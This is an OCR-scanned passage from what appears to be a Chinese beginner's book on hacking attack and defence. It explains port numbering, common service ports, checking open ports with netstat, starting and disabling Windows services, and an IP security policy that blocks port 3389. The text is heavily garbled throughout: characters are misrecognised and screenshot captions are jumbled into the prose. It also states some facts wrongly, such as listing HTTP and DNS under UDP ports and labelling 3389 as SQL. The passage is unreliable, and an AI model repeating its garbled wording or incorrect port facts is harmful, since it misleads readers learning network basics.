机 、 路 由 需 等 用 于 连接 其 他 的 网 络 设备 的 接口 ; 二 是 逻辑 意义 上 的 病 口 ,一 般 指 TCP/IP 
协议 中 的 端口 ， 范 围 为 0 一 65 535， 如 浏览 网 页 服务 的 80 端口 ， 用 于 FTP 服务 的 21 
端口 等 。 

逻辑 意义 上 的 端口 有 多 种 分 类 标准 ， 和 常见 的 分 类 标准 有 如 下 两 种 。 

1. 按 端 口号 分 布 划 分 

按 问 口号 分 布 划 分 ， 可 以 分 为 公认 端口 、 注 册 新 口 ， 











表 1-2 ”服务 回音 见 应 用 端口 
务 














以 及 动态 和 /或 端口 等 .服务 器 常见 应 用 端口 如 表 1-2 所 示 。 端口 服 
(1) 公认 交口 站 FTP 
公认 端口 包括 端口 号 范围 是 0 一 1023。 它 们 紧密 绑 定 和 Tomel 

于 一 些 服务 。 通 常 ， 这 些 端口 的 通信 明确 表明 了 某 种 服务 一 人 

的 协议 ， 比 如 80 端口 分 配给 HTTP 服务 ，21 端口 分 配给 a 

FTP 服务 等 。 80 HTTP 

110 POP3 


(2) 注册 端口 








TD 从 [es NR i 4 
注册 端口 端口 号 为 1024 一 49 151。 它 们 松散 地 绑 定 于 ee a 
i 、、 Pee vy TI VD ~ 
一 些 服务 。 也 就 是 说 ， 有 许多 服务 绑 定 于 这 些 端 口 ， 这 些 1521\1526 ORACLE 
症 口 同样 用 于 许多 其 他 目的 ， 比 如 许多 系统 处 理 动态 并 口 3306 MySQL 
人 
从 1024 0 四 3389 SQL 
(3) 动态 和 /或 私有 闪 口 8080 Tomcat 





动态 和 /或 私有 端口 的 端口 号 为 49 132 一 65 535。 理 论 
上 ， 不 应 为 服务 分 配 这 些 痕 口 。 但 是 一 些 木 马 和 病毒 就 比较 喜欢 这 样 的 山口 ， 因 为 这 些 病 
口 不 易 引 起 人 们 的 注意 ， 从 而 很 容易 屏蔽 。 

2， 按 协议 类 型 划分 

根据 协议 类 型 ， 端 口 又 可 分 为 TCP 端口 和 UDP 端口 两 种 。 一 般 直 接 与 接收 方 进行 的 
连接 方式 ,大 多 采用 TCP 协议 。 只 是 把 信息 放 在 网 上 发 布 出 去 而 不 去 关心 信息 是 否 到 达 ( 也 
即 “ 无 连接 方式 ”)， 则 大 多 采用 UDP。 

使 用 TCP 协议 的 第 见 端 口 主 要 有 如 下 儿 种 。 

(1) FTP 协议 端口 

FTP 即 文件 传输 协议 ， 使 用 21 端口 。 某 计算 机 开 了 FTP 服务 ， 便 局 动 了 文件 传输 服 
务 ， 下 载 文件 和 上 传 主页 都 要 用 到 FTP 服务 。 

(2) Telnet 协议 端口 

访问 口 是 一 种 用 于 远程 登录 的 靖 口 ， 用 户 可 通过 自己 的 里 份 远程 连接 到 计算 机 上 ， 通 
过 这 种 问 口 可 提供 一 种 基于 DOS 模式 的 通信 服务 。 如 支持 纯 字 从 界面 BBS 的 服务 器 会 将 
23 端口 打开 ， 以 对 外 提供 服务 。 

(3) SMTP 协议 端口 

现在 很 多 邮件 服务 器 都 使 用 这 个 简单 邮件 传送 协议 来 发 送 邮 件 。 如 常见 的 免费 邮件 服 
务 使 用 的 就 是 此 邮件 服务 端口 ， 所 以 在 电子 邮件 设置 中 经 常会 看 到 SMTP 端口 设置 栏 ， 服 
务 絮 开放 的 是 25 号 端口 。 

(4) POP3 协议 端口 

POP3 协议 用 于 接收 邮件 ,通常 使 用 110 端口 ,只 要 有 使 用 POP3 协议 的 程序 (如 Outlook 
等 )， 就 可 以 直接 使 用 邮件 程序 收 到 邮件 (如 126 邮箱 用 户 就 没有 必要 先进 入 126 网 站 ， 再 


0 






































1 





从 妻 开始 认识 黑客 


进入 目 己 的 邮箱 来 收 信 了 。) 

使 用 UDP 协议 的 常见 端口 主要 有 如 下 几 种 。 

(1) HTTP 协议 关口 

HTTP 是 用 户 使 用 的 最 多 的 协议 ， 即 “ 超 文 本 传输 协议 ”。 当 上 网 浏览 网 页 时 ， 束 要 在 
提供 网 页 资源 的 计算 机 上 打开 80 号 端口 以 提供 服务 。WWAW 服务 和 Web 服务 右 等 使 用 的 
束 是 这 个 问 口 。 

(2) DNS 协议 端口 

DNS 用 于 域名 解析 服务 ， 这 种 服务 在 Windows NT 系统 中 用 得 最 多 。Internet 上 的 每 一 
台 计 算 机 都 有 一 个 网 络 地 址 与 之 对 应 ， 这 个 地 址 就 是 卫 地址 ， 它 以 纯 数字 形式 表示 。 但 由 
于 这 种 表示 方法 不 便于 记忆 ， 于 是 整 出 现 了 域名 ， 访 问 计 算 机 时 只 需要 知道 域名 即 可 。 域 
名 和 IP 地 址 之 则 的 变换 由 DNS 服务 器 来 完成 (DNS 用 的 是 53 号 端口 )。 

(3) SNMP 协议 端口 

SNMP 即 简 单 网 络 管理 协议 ， 用 来 管理 网 络 设备 ， 使 用 161 亏 端 口 。 

(4) QQ 协议 端口 

QQ 程序 既 提 供 服 务 又 接收 服务 , 使 用 无 连接 协议 , 即 UDP 协议 。QQ 服务 器 使 用 8000 
号 交口 侦 听 是 否 有 信息 到 来 ， 客 户 端 使 用 4000 号 端口 问 外 发 送信 息 。 














12.4 至 看 痛 口 


为 了 奉 找 目标 主机 上 都 开放 了 哪些 端口 ， 可 以 使 用 某 些 扫描 工具 对 目标 主机 一 定 苑 
内 的 端口 进行 扫描 。 只 有 掌握 目标 主机 上 的 端口 开放 情况 ， 才 能 进一步 对 目标 主机 进 
行 攻 击 。 

在 Windows 操作 系统 中 ， 可 以 使 用 netstat 命令 查看 问 口 。 在 “命令 提示 从 ”窗口 中 运 
行 “netstat-a-n” 命 令 ， 即 可 看 到 以 数学 形式 显示 的 TCP 和 UDP 连接 的 端口 写 及 其 状态 ， 
具体 步骤 如 下 。 


STEP01: 单 击 “开始 ”按钮 STEP02: 输入 “cmd” 命 令 








9 58 帮 才 
Monitor Tomcat 
“| 


Microsoft Baseline Security 


& Analyzer 2,2 


EES Shadow Security Scanner 


WCFreePortScanner 






yr Windows 将 根据 您 所 输入 的 名 称 ， 为 您 打开 想 应 的 程序 、 
一 一 文件 夫 、 文 栏 或 Internet 资源 。 







A 
嫩 ProtectX Hacker Defence Suite 


》 ”所 有 程序 





在 弹出 的 “开始 ”菜单 中 单 击 “ 运 行 ”按钮 。 在 文本 框 中 输入 单 击 “ 确 定 ”按钮 。 


“cmd’” 命令 。 


J 


> 


黑 名 


全 人 人 他 
STEP03: 输入 “netstat-a-n” 命令 


六 攻防 从 入 门 到 精通 








Fr 
国 管理 员 : C:\Windows\system32\cmd.exe = [9 
i [hi 本 6 .1.?6@1 
icrosoft Corporation 末 留 P 





-一 AAA Ps 


_ 打开 命令 提示 符 窗 口 后 输入 “netstat-a-n” 
命令 ,查看 TCP 和 UDP 连接 的 端口 号 及 其 状态 。 


林地 地 址 
.0.606.060:808 
[5 


LISTENING 


| 
-B.A.60:8 
日. 日 .日 .日 :日 
[5 .6.0.60:08 
[5 i.0.0.0:0 
[5 .6.860.060:0 
8.8.86.0:2113 .6.0.6:06 
8.0.0.0:3389 a.0.60.6:8 
(5 9 .DB.9.9:9 
[5 1 .日 -日 -日 :5 
i .日 :日 


0.0.0.0:8892 .0.0.0:0 

0.0.0.0:11888 .9.0.0: 

0.0.0.0:21320 .6.6.0:0 STENING 人 
DB:g LISTENING 


6099:21321 




















如 果 攻 击 者 使 用 扫 摘 工具 对 目标 主机 进行 扫 摘 , 即 可 获取 目标 计算 机 打开 的 端口 情况 ， 
并 了 解 日 标 计算 机 提供 了 哪些 服务 。 根 据 这 些 信 息 ， 攻 击 者 即 可 对 日 标 主 机 有 初步 了 解 。 

如 条 在 管理 员 不 知情 的 情况 下 打开 了 太 多 器 口 ， 则 可 能 出 现 两 种 情况 : 一 种 情况 是 过 
供 了 服务 但 管理 者 没有 注意 到 ， 例 如 安 闻 IS 服务 时 ， 软 件 就 会 目 动 地 增加 很 多 服务 ， 帮 
一 种 情况 是 服务 器 被 攻击 者 植 入 了 木马 程序 ， 通 过 特殊 的 冰 口 进行 通信 。 这 两 种 情况 都 比 
较 和 危险 ， 管 理 员 不 了 解 服务 需 提供 的 服务 ， 就 会 降低 系统 的 安全 系数 。 














1.2.5 ”开局 和 天 闭 疾 口 


默认 情况 下 ，Windows 操作 系统 有 很 多 端口 是 开放 的 ， 用 户 在 上 网 时 ， 网 络 病毒 和 轩 
客 可 以 通过 这 些 问 口 连 接 用 户 的 计算 机 。 为 了 让 系统 变 为 更 加 安全 ， 应 该 封闭 这 些 问 口 ， 
主要 有 135、139、445、593、1025 TCP 端口 和 135、137、138、445 UDP 端口 、 一 些 流 行 
病毒 的 后 门 端口 (如 2745、3127、6129 TCP 端口 ) 以 及 远程 服务 访问 端口 3389。 

1. 开启 端口 

在 Windows 操作 系统 中 开局 端口 的 具体 操作 步骤 如 下 。 


单 击 “开始 ”按钮 














STEPO1: STEP02: 打开 控制 面板 





本 计算 机 管理 文件 (月 ”编辑 (F) ”查看 (V) 工具 mm 帮助 (H) 


调整 计算 机 的 设置 


到 ” 协 TFTHIC 


SS 
360 安 全 
中 0 安全 卫士 
朵 /性 六 局 切 配 


疆 ， 电 话 和 调制 解 调 器 


名 电源 选项 





在 "开始 " 菜单 中 单 击 “控制 面板 ”选项 。 


剧 个 性 化 
咖 几 恢复 
起 交 长 ii 
@ 了 程序 


@ 轻松 访问 中 心 


将 查看 方式 切换 为 


“大 图 标 ”。 





Q 妨 这 丘 组 


加 竺 所管 理 # 





2 ras 


国 单 击 


“管理 
工具 ”选项 。 


eo 


STEP03: 打开 “管理 工具 ”窗口 








多 Internet 信息 服务 (TS) 管 理 器 
食 isCsI 发 起 程序 
万 windows PowerShell Modules 


2013/12/16 10:56 
2009/7/14 12:41 
2009/7/14 12:52 
2009/7/14 12:41 
2011/5/26 10:15 
2011/5/26 10:15 
2009/7/14 12:41 
2009/7/14 12:41 
2009/7/14 12:41 
2009/7/14 12:42 
2009/7/14 12:42 





STEP04: 打开 “服务 ”窗口 





文件 (月 ”操作 (A) 查看 (V) 帮助 (H) 


i 


从 零 开 始 认 识 黑 各 





和 中 | 国 | GBI 加 | pal 





% Net.Pipe Listene... 
SS Net.Tcp Listener... 
3 Net.Tcp Port Sh... 
， 3 Netlogon 

a| 3 Network Access ... 


$F Network Connec... 
3 Network List Ser.., 
SS Network Locatio... 
S Network Store L.. 

莫 Office Source E... 
3 Office Software ... 

3 offline Files 

SS parental Controls 

3 peer Name Res... 

3 peer Networkin... 


绪 Peer Networkin... 
Hperformance Lo... 
Plug and sf 


和 














双击 ,服务 ， 选项 。 
STEP05: 启动 服务 


查看 多 种 服务 项 目 。 
STEP06: ”启动 类 型 设置 
Application Identity 的 居 性 (本 地 计算 机 ) 计时 ” 


启动 类 型 吧 ) : 


En 


在 应 已 启动 ”手动 
已 启动 ”自动 


Ss Application Expe... 
守 Application Host,., 为 1. 


a APPlication 1den... 启动 (S) 


停止 (0) 
暂停 (U) 
恢复 (M) 
重新 启动 (E) 


所 有 任务 (多 
刷新 ( 


SF: Application Infor. 
SF, Application Laye,。 





服务 状态 : 


i 疝 二 当 欠 此 处 启动 服务 时 ， 您 可 指定 所 适用 的 启动 参数 。 
5 g En,， 


SBDMRITP Service 启动 参数 出) : 
BDSGRTP Service | 


可 BitLocker Drive .… 
| 应 用 WW ] 


SS Application Man... 
SS ASP,NET State S.. 


$$ Background Inte.. 








恢复 在 ) 


六 让 到 | | 


暂停 宇 】 | | 





Baidu Updater 








ci Blnrk | onsl Barl- 








选 定 要 启动 的 服务 后 ， 右 击 该 服务 ， 在 弹出 的 快 
捷 菜 单 中 选择 “属性 ”命令 。 


在 “启动 类 型 ”下 拉 列 表 ” 国 启动 成 功 后 
框 中 选择 “自动 ”选项 , 然后 ” 单 击 "确定 ” 按 
单 击 “启动 ”按钮 。 钮 。 


STEP07: 查看 已 启动 的 服务 


SG Apache Tomcat ,,。 Apa,。 

企 应 ,， 已 启动 ”手动 
了 Application Host..， 为 1. 

| Application Iden..， 确 定 ..… 

SApplication Infor... 


Application Expe... 


可 以 看 到 该 服务 在 “状态 栏 已 标记 为 
pe “已 启动 ”， 启 动 类 型 为 “自动 ”。 

s% Application Laye... 
Si Application Man... 
SASP,NET State S.., 


全 ,Background Inte... 


© Baidu Updater 

:Base Filtering En... 
BDMRTP Service 
,BDSGRTP Service 

SE BitLocker Drive ... BDE... 





2. 关闭 端口 
在 Windows 操作 系 乡 


1 


中 关闭 端口 的 具体 操作 步骤 如 下 。 





文件 (P。 操 fF(A)， 豆 看 (V) 帮助 (H) 

和 宁国 | GEIBBl ?el 
一 服务 (本 地 ) 

Office Source Engine 


二 Net.Tcp Listener... 
Net.Tcp Port Sh... 
并 | 伟 Netlogon 
专 Network Access ... 
志 Network Connec... 
方 Network List Ser.， 识 别 . 
广 Network Locatio... 
方 Network Store 工 . 
*Office Source E,. 
专 Office Software ... 
志 Offline Files 
Parental Controls 
专 Peer Name Res... 


寺 Performance Lo.. 
SPlug and Play 
DnD-¥ 1D Rue Fn _DnD- 











STEP03: 启动 类 型 设置 


启动 类 型 呈 ): 
都 助 我 柄 弟 服 务 E 
服务 状态 : 








启动 3 停止 (7) 暂 信 (E) | 恢复 让) 





当 从 此 处 启动 服务 有 时， 您 可 指定 所 适用 的 启动 参数 。 


启动 琵 数 出 ) : 








用) 





在 “启动 类 型 " 下 拉 列 表 服务 停止 


框 中 选择 “ 茶 用 ` 选项, 然后 单 击 “ 确 定 按 


单 击 “ 停 止 ”按钮 。 钮 。 


1.2.6 ”新 口 的 限制 


AS 


攻防 从 入 门 到 精通 


Apache Tomcat ,… 


SApplication Expe... 
Application Host... 
aApplication Iden... 
SApplication Infor... 
Application Laye... 
Application Man... 


Si ASP.NET State S.., 


Background Inte... 


5 Baidu Updater 


5 Base Filtering En... 


BDMRTP Service 
BDSGRTP Service 


5 BitLocker Drive ... 


Apache Tomcat ... 


Application Expe... 


有 A pplication Iden... 
Si Application Infor... 
Application Laye... 
Application Man... 
SASP.NET State S$... 


SBackground Inte... 


Baidu Updater 


S$ Base Filtering En... 


守 BDMRITP Service 
法 BDSGRTP Service 


各 BitLocker Drive .. 


STEP02: 关闭 服务 


Apa... 


守 Application Host... 为 IL... 
为 In.. 
为 通 ... 
Prov... 
百度 ,… 
百度 … 


百度 … 


BDE... 





启动 ($) 


停止 (O) 
暂停 (U) 
恢复 (MI) 
至 新 局 动 (6) 


所 育 任 务 (向 





选 定 要 关闭 的 服务 ， 右 击 该 服务 在 弹出 的 列表 中 
选择 “属性 ”选项 。 


STEP04: 查看 已 停止 的 服务 


手动 
手动 
已 启动 ”自动 





可 以 看 到 该 服务 启动 类 型 已 标记 为 “禁用 ”,“ 状 


栏 中 也 不 再 标记 “已 启动 ”。 








Windows 用 户 可 以 随意 选择 对 服务 融 站 口 的 限制 。 系 统 堆 认 情 况 下 ， 许 多 没 用 或 者 有 
危险 的 痛 口 默认 为 开局 的 ,可 以 选择 将 这 些 端 口头 闭 。 例 如 ，3389 尊 口 是 一 个 危险 的 端口 ， 
但 是 系统 默认 该 洋 口 为 开 司 ， 用 户 可 通过 使 用 耳 打上 略 阻 止 访问 该 端口 。 


具体 议 症 的 操作 步骤 如 下 。 


加 2 


< 1 章 





STEP01: 打开 “管理 工具 ”窗口 





文件 (站 ”编辑 (E) ” 音 看 (V) ”工具 (T) 帮助 








名 称 四 

守 Internet 信息 服务 [ITS) 管 理 器 

后 iSCSI 发 起 程序 

好 Windows PowerShell Modules 
国 Windows 内 存 诊 新 


各 最 乒 访 问 的 位 置 





局 库 
关 PPTV 视 频 
秋 视频 
图 图 片 
名 | 迅雷 下 载 
直言 乐 


STEPO3: 


欢迎 使 用 IP 安全 策略 向 导 


tr 


单 击 “ 下 一 步 ”继续 。 





单 击 “ 下 一 步 ”按钮 。 


STEP05: 安全 通信 请 求 


安全 通讯 请 求 
指定 这 个 策略 如 何 对 安全 通讯 的 请 求 作 出 响应 。 


a 


汉 各 计 算 机 作 db 应 。 为 


省: 恨 在 运行 是 ndows 2003 和 Windows XP 的 计算 机 上 支持 默认 啊 应 规 


回 激活 默认 响应 规则 (可 限于 旺 ndows 的 早期 版 本 ) (R) 。 


ED 





单 击 “ 下 一 步 ” 
接 领 。 


取消 勾 选 “激活 默认 
响应 规则 ” 复 选 框 。 


3 











从 零 开 始 认 识 黑 客 


STEP02: 创建 IP 安全 策略 


”上 | 公 届 策略 
| 四 软件 限制 策略 
> 应 用 程序 控制 策略 


国 公 铀 第 略 
站 软件 限制 策略 





管理 IP 全 | 下 和 防 渤 衣 巡 作 (Mj. 
所 有 任务 (向 

局 新 [ 

帮助 (H) 


右 击 “IP 安 全 策略 在 本 地 计算 机 ”选项 ， 在 弹出 
的 快捷 菜单 中 选择 “创建 IP 安 全 策略 ”命令 。 


STEP04: 输入 安全 策略 名 称 


IP 安全 策略 名 称 
命名 这 个 IF 安全 第 略 并 且 给 出 一 个 简短 的 描述 


名称 血 ): 
限制 访问 3389 庙 口 
东 述 血 ) : 








CE 


辆 输入 名 称 以 及 单 击 “ 下 一 步 ”按钮 。 


描述 信息 瀛 \O 


STEP06: ”完成 IP 安全 策略 的 创建 


正在 完成 IP 安全 策略 向 导 


您 已 成 功 地 完成 指定 您 的 新 IT 安全 策略 的 属性 。 


要 放生 你 提 也 家 人 半 昌 ， 请 过 中 “编辑 属 性 "和 


站 编辑 属性 全) 


若 要 关闭 此 向 导 ， 请 单 击 “ 充 成 ”。 





贺 取消 勾 选 “编辑 属 国 单 击 “ 完 
性 ” 复 选 框 。 按钮 。 





取 天 一 =、 
关 有 攻防 从 入 门 到 精通 





全 人 人 他 
STEP07: 管理 IP 筛选 器 STEP08: 进入 “管理 IP 筛选 器 列表 ” 选 
项 卡 


， 辐 公 钥 策略 念 至 人 P 体 迁 菇 列表 和 条 选区 尝 作 
”| 软件 限制 策略 管理 IF 沁 选 器 列表 | 管理 沛 选 器 操作 
，[ 困 应 用 程序 控制 策略 

一 上 请 要 侣 让 | 诗 并 维护 定义 您 的 风 9 络 流 时 的 开 简 





所 有 IF 安全 策略 都 共享 六 些 可 用 的 IF 沛 选 器 列表 。 


TT 请 选 器 列表 (); 

圭 春 (V) 撕 计 
刷新 () / z 
导出 列表 届 )... 编辑 企 】.. . 删除 (E) 











帮助 {H) 
右 击 “|IP 安 全 策略 ”选项 ， 在 弹出 的 快捷 菜单 中 单 击 “添加 ”按钮 。 
选择 “管理 |P 筛 选 器 列表 和 筛选 器 操作 ” 命令 。 
STEP09: 添加 指定 名 称 的 筛选 器 STEP10: IIP 季 选 器 向 导 
IP 人知 选 器 向 导 


IF 下 志 朋 名 请 选 器 组 成。 这 样 ， 欢迎 使 用 IP 筛选 器 向 导 


合 到 一 





六 者 助 你 提供 饥 选 IF 流 里 需要 的 源 、 目标 和 通信 





区 和 a 
[页 加 让 站 昌 本 玫 和 抽 下 光 2 区 


IP 闹 竟 证 G): 添加 则 号 ”(W) 
源 DNS 名 称 源 地 址 








国 | 输入 筛选 器 名 称 。 单 击 “添加 ”按钮 。 ” 单 击 “ 下 一 步 ”按钮 。 
STEP11: IP 筛选 器 描述 和 镜像 属性 STEP12: 选择 源 地 址 


J 第 和 各 并 术 和 入 人 属性 pe a 
字段 来 指定 IF 乌 i 或 ; 0 站 定 IF 流量 的 源 9 
戎 :人 SE 





源 地 址 &): 


限制 运行 338 吕 山口 。 



































在 文本 框 中 输入 单 击 “ 下 一 步 ” 在 " 源 地 址 " 下 拉 列 表 框 中 图 单 击 “ 下 一 步 ” 
描述 信息 。 按钮 。 选择 IP 流 量 的 源 地 址 。 按钮 。 
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后 第 ! 章 





STEP13: 选择 目标 地 址 


流量 目标 
指定 IP 流量 的 目标 地 址 。 





目标 地 址 久 ): 








在 “目标 地 址 "下 拉 列 表 
框 中 选择 IP 流 量 的 目标 地 址 。 按钮 。 


STEP15: 选择 IP 协议 端口 


协 说 端口 
许多 TCP/IP 应 用 程序 协议 建立 在 常用 的 TCF 或 UDP 端口 上 。 





设置 IP 协议 端口 : 
图 从 任意 端口 F) 
加 从 上 端口 8): 





回 到 任意 端口 1) 
图 到 此 端口 加 ) : 
3389| 


选中 “从 任意 端 0" 和 图 单 击 “下 一 步 " 
“到 此 端口 " 单 选 按钮 ， 此 ”按钮 。 


端口 端口 号 设置 为 3389。 
STEP17: 返回 “|P 筛选 器 列表 ”对 话 框 


和 | IP 利 选 器 列表 





3389 辣 口 淀 选 器 

i [添加 8... ] Lh 

描述 m): 
遇 除 外 ) 


加 使 用 “添加 向 导 ” 名) 


源 DNS 名 称 源 地址 
《任何 IP 地 址 > ”< 任何 IP 地 址 > 





IP 师 选 器 (5): 
镜像 ” ”描述 
是 限制 运行 3389... 











查看 已 创建 的 筛选 器 ， 并 单 击 “ 确 定 ” 按 钮 。 


四 





单 击 “ 下 一 步 ” 








从 妻 开始 认识 黑客 


STEP14: 选择 协议 类 型 


IP 竺 选 占 向 导 ” 


IP 协议 类 型 
将 IP 协议 类 型 。 如 果 类 型 是 TCP 或 和 P， 您 将 财 卉 定 源 和 目标 端 





选择 协议 类 型 (3): 


在 下 拉 列 表 框 中 选择 单 击 “ 下 一 步 " 
“TCP” 协议 类 型 。 按钮 。 


STEP16: ”完成 |P 筛选 器 的 创建 
IP 算 选 器 向 导 
正在 完成 IP 筛选 器 向 导 


您 已 成 功 地 完成 IP 靖 选 嚣 向导。 
Bl: 永 的 i ，1 吉 i ws = 
二 ?办 局 可 全 的 和 要 请 选中 “编辑 属性 ” 复 选 


若 要 关闭 此 向 导 ， 请 单 击 “ 充 成 ”。 


取消 勾 选 “编辑 属 单 击 “ 完 成 " 
性 ” 复 选 框 。 按钮 。 
STEP18: 管理 惫 选 器 操作 


管理 IP 侯 先 化 列 表 和 和 秘 选 器 操作 


管理 IP 乌 选 器 列表 | 管理 饥 选 器 操作 | 


入 对 二 但 使 多 询 创建 开 维护 于 义 估 如 安全 的 路 选 三 


所 有 IF 安全 第 略 共享 可 用 的 沛 选 器 操作 。 





师 选 器 操作 全 ): 


尖 加 二 二 [编辑 Fy] [ 量 除 ) ] 回 售 用。 党 





切换 至 “管理 园 取消 勾 选 “ 使 用 ' 添 加 向 
第 选 器 操作 ”选项 导 ' ” 复 选 框 , 然后 单 击 " 添 
卡 。 加 ”按钮 。 


EE 
取 
靳 全 人 人 他 


STEP19: 设置 第 选 器 操作 为 阻止 


rn 





避 协商 安 全 0): 
安全 方法 首选 | 顺序 (3): 


AH 完整 性 


星际 名 ) 
L 上 移 m |] 
| 下 移 o) | 
[| 接 爱 不 安全 的 通讯 ， 但 始终 用 IFsec 响应 站 ) 


[如 果 无 法 建立 安全 连接 ， 则 允许 回 退 到 不 安全 的 通信 部) 
由 使 用 会 话 密 钥 完全 向 前 保密 中 FS) (k) 


ESP 机 密 性 





单 击 “ 确 定 ” 
选 按钮 。 按钮 。 


STEP21: 返回 “本 地 安全 策略 ”窗口 


选择 “阻止 ” 单 


文件 ( ”操作 (A) ”前 看 (V) 帮助 (H) 


攻防 从 入 门 至 





| 








包 中 | 六 国 | 交 四 已 | 日 辣 | 痢 直 | 针 有 

取 安全 设置 

[也 帐户 策略 

[有 本 地 策略 

、| | 高 级 安全 Windows 防火 培 
门 网 阁 列表 管理 钟 策略 

> 国 | 会 铀 策略 

| 软件 限制 策略 

> 门 应 用 程序 控制 策略 

;出 IP 安全 策略 ， 在 本 地 计算 机 

站 高 级 案 核 策略 配置 


限制 访问 3389 洋 口 





双击 创建 的 |P 安 全 策略 。 
STEP23: 创建 IP 安全 规则 


安全 规则 向 导 
欢迎 使 用 创建 IP 安全 规则 向 导 


人 


PE 
Ei 
安 


J 
全 操作 : 
IF 隧道 操作 属性 
身份 验证 方法 
谢 选 刁 操 作 


单 击 “下 一 步 ”继续 。 























二 


单 击 “下 一 步 ” 按 钮 。 





I 精通 


STEP20: ”成功 添加 筛选 器 操作 
管理 IP 笠 选 如 列 专 可 竹 选 如 泽 和 作 


管理 IF 谢 选 器 列表 | 管理 饰 选 器 操作 
要 下 二 相仿 访 能 创建 并 淮 扩 定义 全 后 搬 实 全 的 靖 计 本 


所 有 IP 安全 策 略 共 享 可 用 的 注 选 老 操 作 。 





凯 选 器 操作 全): 


| 


FT 





查看 已 添加 的 单 击 “ 关 闭 ”按钮 。 


筛选 器 操作 。 
STEP22: 添加 1P 规则 


限制 访问 3389 凋 口 硬性 


旧 浊 和 其 他 计算 机 通讯 的 安全 规则 





IF 安全 规 刚 CT): 


IF 病 选 强 列 表 
口 动态 > 


凯 选 器 操作 身份 验证 方法 ” 隘 
黑 WAN9 (BR 于 ... Kerberos < 
CEI 


是 陆 回信 用 添加 向 


LE 用 内 | 
在 “规则 ”选项 卡 中 单 击 “ 添 加 ”按钮 。 
STEP24: 指定 IP 安全 规则 的 隧道 终结 点 
安全 规则 向 导 
道 终结 点 


终 
道 终结 点 旺 近 IP 流 祭 的 隧道 操作 ， 的 
下 全 缚 司 作 吉 撞 2 下 皇 目 标 的 隘 道 操作 计算 机 ， 正 如 安全 规则 的 





或 于 朋 公用 


指定 IP 安全 规则 的 隧道 终结 点 : 

加 此 规则 不 指定 隧道 IY) 

加 障 道 终结 点 由 下 列 IP 地 址 指定 (7): 
IFv4 隧道 终结 点 : 


ITPv6 障 道 终结 点 : 








[ED 


选择 “此 规则 不 指 单 击 “ 下 一 步 " 
定 隧 道 ” 单 选 按 钮 。 按钮 。 


从 雪 开 始 认识 黑客 


STEP25: 选择 网 络 类 型 STEP26: 选择 IP 季 选 器 








网 络 类 型 IP 筛选 器 列表 
安全 规则 必须 应 用 到 一 种 网 络 类 型 。 请 为 采用 这 个 安全 规则 的 TP 流量 类 型 选择 TP 乌 选 器 列表 。 





如 果 下 面 的 列表 没有 符合 您 需要 的 IP 病 选 嚣 ， 请 单 击 “ 湛 加 ”来 创建 新 的 。 


名 局 域 网 Chi C) IP 肇 选 器 列表 恕 ) : 
名 远程 访问 R) 


3389 丝 口 沛 选 吕 








消 4 上 一 步 中 ) 


选中 “所 有 网 络 连 接 ” 单 击 “ 下 一 步 ” ”图 选中 “3389 端 口 第 国 单 击 “下 一 步 " 
单 选 按钮 。 按钮 。 选 器 ” 单 选 按钮 。 按钮 。 


STEP27: 选择 筛选 器 操作 STEP28: 完成 安全 规则 创建 

安全 规则 向 导 Xs 安全 规则 向 导 
先 器 操作 i 
请 为 这 个 安全 规则 选择 沛 选 器 操作 。 正在 完成 安全 规则 向 导 
如 下 了 天 的 和 击 中 没有 息 人 项 村 的 引 办 提 作 ， 诗 单 而 “添加 ”| 建 一个 亲 

福 选 器 操作 C): 回 使 用 “添加 向 导 ”() 

名 称 描述 - 

| os | 

[_ 映 除 @) ] 


您 已 成 功 完成 指定 您 的 新 规则 的 属性 。 
要 闻 有 各 多 安全 机 ul， 请 寺 择 “编辑 导 性 "然后 单 


若 要 关闭 此 回 导 ， 请 单 击 “ 充 成 ”。 














园 选 中 “新 筛选 器 操作 ” ” 国 单 击 “ 下 一 步 " 取消 勾 选 “ 编 辑 属 国 单 击 “ 完 成 ” 

单 选项 。 按钮 。 性 ” 复 选 框 。 按钮 。 

STEP29: 返回 “限制 访问 3389 端口 STEP30: 返回 “本 地 安全 策略 ”对 话 框 
属性 ”对 话 框 


限制 访问 3389 庙 口 屋 性 
文件 ( ”操作 (A) ”查看 (V) ”帮助 (H) 
旬 四 | 向 园区 国名 | 四 加 | 征 主 | 忆 
加 过 和 其 他 计算 机 通讯 的 安全 规则 如 安全 设置 
[帐户 策略 
二 ，[ 呈 本 地 第 略 
王 安全 机 ， 辐 高 级 安全 Windows 防火 培 
IP 访 选 器 列表 入 选 器 操作 身份 输 证 方法 隘 i 
3369 庙 口 入 选 器 。 新 饥 选 器 操作 E> 无 ， 癌 公 角 第 略 删除 (D) 
口 动态 > i 、 三 | 软件 限制 策略 重 命名 (M) 
WII 
' es ， 辐 应 用 程序 控制 策略 


ETI TT ,局 玉 安 全 俩 咯 ， 在 本 号 讲 机 届 性 (R) 
站 高 级 庆 核 第 略 配 置 帮助 (H) 
单 击 “ 确 定 ” 按 钮 。 右 击 新 建 的 IP 安 全 策略 ， 在 弹出 的 快捷 菜单 中 选 
择 “分配” 命令 完成 设置 。 


7 让 





所 有 任务 (向 








de > 
全- 攻防 从 入 门 到 精通 
全 人 人 他 


1.3 ” 单 见 的 网 络 协议 


在 网 络 中 ， 计 算 机 之 间 需 要 交换 信息 ， 融 必须 使 用 相同 的 网 络 协议 。 网 络 协议 融 像 人 
们 说 话 使 用 的 茶 种 语言 一 样 ， 它 是 网 络 上 计算 机 之 间 的 一 种 语言 。 
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TCP/IP (Transmission Control Protocol/Internet Protocol， 传 输 控 制 协议 /互联 网 络 协议 ) 
是 最 基本 的 Internet 协议 ， 是 由 网 络 层 的 卫 协议 和 传输 层 的 TCP 协议 组 成 的 ， 主 要 用 于 规 
江 网 络 上 所 使 用 的 通信 设备 ， 也 是 一 台 主 机 与 男 一 台 主 机 之 则 数据 的 传送 方式 。 在 Internet 
中 ，TCP/P 协议 是 最 基本 的 协议 ， 是 传输 数据 打包 和 寻 址 的 标准 方法 。 

TCP/P 允许 独立 的 网 络 添加 到 Internet 中 或 私有 的 内 部 网 〈Intranet) 中。 通过 路 由 器 
(可 以 将 一 个 网 络 的 数据 包 传 输 给 男 一 个 网 络 的 设备 ) 或 IP 路 由 右 等 设备 将 独立 的 网 络 连 
接 在 一 起 ， 右 构成 了 内 部 网 。 在 使 用 TCP/P 协议 的 内 部 网 中 ， 数 据 将 被 分 成 独立 的 IP 包 
或 IP 数据 包 数 据 单 元 进行 传输 。 

TCP/IP 通常 被 称 为 TCP/IP 协议 簇 。 在 实际 应 用 中 ，TCP/ 耻 是 一 组 协议 的 代名词 ， 它 
